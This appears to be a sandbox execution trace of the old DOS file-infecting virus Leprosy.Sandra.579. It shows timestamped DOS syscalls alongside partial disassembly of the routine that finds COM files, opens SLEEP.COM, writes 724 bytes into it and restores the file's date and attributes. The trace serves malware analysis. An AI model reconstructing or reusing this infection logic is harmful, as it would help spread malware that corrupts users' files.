Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Sandra.579

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:28.497963259Z 44 PC: 12b4b | Get time
0x12b4b: cmp byte ptr [0x107], 0
0x12b50: je 0x12b52
0x12b52: cmp dl, 0
0x12b55: je 0x12b47
0x12b57: mov byte ptr [0x107], dl
0x12b5b: mov byte ptr [0x17a], 0
0x12b60: mov byte ptr [0x17b], 1
0x12b65: mov byte ptr [0x184], 0
0x12b6a: mov cx, 0x27
0x12b6d: mov dx, 0x157
0x12b70: mov ah, 0x4e
0x12b72: int 0x21
0x12b74: cmp ax, 0x12
0x12b77: je 0x12b7c
0x12b79: call 0x12b9e
0x12b7c: mov cx, 0x27
0x12b7f: mov dx, 0x15d
0x12b82: mov ah, 0x4e
0x12b84: int 0x21
0x12b86: cmp ax, 0x12
2018-12-17T23:01:28.500856395Z 78 PC: 12b74 | Find first file
2018-12-17T23:01:28.508578715Z 78 PC: 12b86 | Find first file
2018-12-17T23:01:28.516695187Z 67 PC: 12bbf | Get or set file attributes
2018-12-17T23:01:28.538382979Z 61 PC: 12bc5 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:28.546665642Z 63 PC: 12bd4 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T23:01:28.553507097Z 62 PC: 12c08 | Close file
2018-12-17T23:01:28.555540769Z 61 PC: 12c11 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:28.566915051Z 44 PC: 12a5a | Get time
0x12a5a: nop
0x12a5b: xor dh, dh
0x12a5d: sti
0x12a5e: rcr dl, 1
0x12a60: rcr dl, 1
0x12a62: mov cx, 0x243
0x12a65: add cx, dx
0x12a67: sti
0x12a68: mov ah, 0x20
0x12a6a: nop
0x12a6b: add ah, 0x20
0x12a6e: cli
0x12a6f: mov dx, 0x100
0x12a72: cli
0x12a73: int 0x21
0x12a75: nop
0x12a76: call 0x12a7b
0x12a79: nop
0x12a7a: ret
0x12a7b: cli
2018-12-17T23:01:28.570126525Z 64 PC: 12a75 | Write file or device (Write 724 bytes on handle 5)
2018-12-17T23:01:28.579538852Z 87 PC: 12c39 | Get or set file date and time
2018-12-17T23:01:28.581779753Z 62 PC: 12c41 | Close file
2018-12-17T23:01:28.590690276Z 67 PC: 12c4e | Get or set file attributes